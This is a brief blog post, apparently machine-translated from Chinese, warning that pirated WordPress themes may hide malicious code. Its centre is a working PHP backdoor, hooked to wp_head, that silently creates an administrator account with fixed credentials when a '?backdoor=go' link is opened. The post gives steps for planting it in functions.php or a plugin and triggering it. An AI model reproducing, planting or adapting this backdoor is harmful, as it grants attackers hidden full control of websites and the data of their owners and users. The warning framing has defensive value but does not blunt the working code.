In addition to a large number of official themes, WordPress also has a large number of theme designers who publish free and paid themes. Many children's shoes often collect themes everywhere, take them back for testing, and some unscrupulous people modify the collected foreign commercial charging themes in Chinese, add dark chains, advertisements, and even malicious code, and then publish them free or for a fee publicly, Induce others to download and use, to achieve a hidden purpose. In addition, these commercial charging themes are generally beta versions, with incomplete theme codes and missing functions. After the commercial themes of individual beta versions are enabled, a large amount of data will be automatically written to the database
The following code is more evil, and can automatically add a user as administrator.
add_action('wp_head', 'holeinthewall'); function holeinthewall() { If ($_GET['backdoor'] == 'go') { require('wp-includes/registration.php'); If (! username_exists('username')) { $user_id = wp_create_user('username', 'password'); $user = new WP_User($user_id); $user->set_role('administrator'); } } }
Add the code to the functions.php file or plug-in of your current topic, and then use a special link, such as: [code] example. com/? Backdoor=go [/code], after opening this link, a user name will be automatically created: username password: password Users with administrator rights will automatically log in, and can do whatever they want later.
Therefore, we advise you not to use pirated themes and plug-ins on your own site, and try to download the theme to the official or original publishing site, so as not to be left in the dark!
Through FTP, the code can be used to retrieve the administrator password.
Source code: https://trickspanda.com/create-backdoor-wordpress/
Most of the articles on this site are original and used for personal learning records, which may be helpful to you, for reference only!